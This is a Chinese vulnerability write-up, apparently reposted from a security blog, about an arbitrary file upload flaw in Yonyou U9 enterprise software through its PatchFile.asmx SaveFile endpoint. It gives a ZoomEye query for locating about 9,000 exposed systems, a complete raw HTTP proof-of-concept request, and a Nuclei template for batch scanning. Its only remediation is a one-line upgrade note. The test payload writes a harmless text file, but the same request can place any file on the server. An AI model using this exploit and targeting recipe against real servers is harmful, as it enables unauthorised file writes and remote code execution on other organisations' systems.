用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

admin 2024年1月30日09:57:19评论123 views字数 2777阅读9分15秒阅读模式

0x01 产品简介

   用友系统-U9 cloud是基于最新应用平台,全新系统架构及开发技术,适配安可要求,融合生态发展,开放标准数据服务接口,并与用友系统-U9 cloud系列产品无缝融合应用,打造场景化、数据化工作驱动的全新产品。这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可,影响资产9000+

用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

        文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统,而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制,可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件。

0x03 ZoomEye语法

app:"用友 U9"

用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

0x04 漏洞复现

POC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1Host: {}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4nConnection: closeContent-Type: text/xml; charset=utf-8Content-Length: 433<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <SaveFile xmlns="http://tempuri.org/">      <binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>      <path>./</path>      <fileName>123.txt</fileName>    </SaveFile>  </soap:Body></soap:Envelope>

用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

Nuclei批量检测POC(请自行搭建环境检测)
id: yonyou-U9-PatchFile-asmx-uploadfileinfo:  name: yonyou-U9-PatchFile-asmx-uploadfile  author: 渗透安全HackTwo  severity: high  description: |    漏洞测试-公众号-渗透安全HackTwo  reference:    - https://127.0.0.1  tags: autovariables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1        Host:{{Hostname}}        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9b        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36        Content-Type: text/xml; charset=utf-8        Connection: close        <?xml version="1.0" encoding="utf-8"?>        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">          <soap:Body>            <SaveFile xmlns="http://tempuri.org/">              <binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>              <path>./</path>              <fileName>{{filename}}.txt</fileName>            </SaveFile>          </soap:Body>        </soap:Envelope>      - |        GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Upload-successfully")

用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

0x05 修复建议

升级至最新版本,官方已经推出新的版本补丁包。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月30日09:57:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘https://cn-sec.com/archives/2443536.html

发表评论

匿名网友 填写信息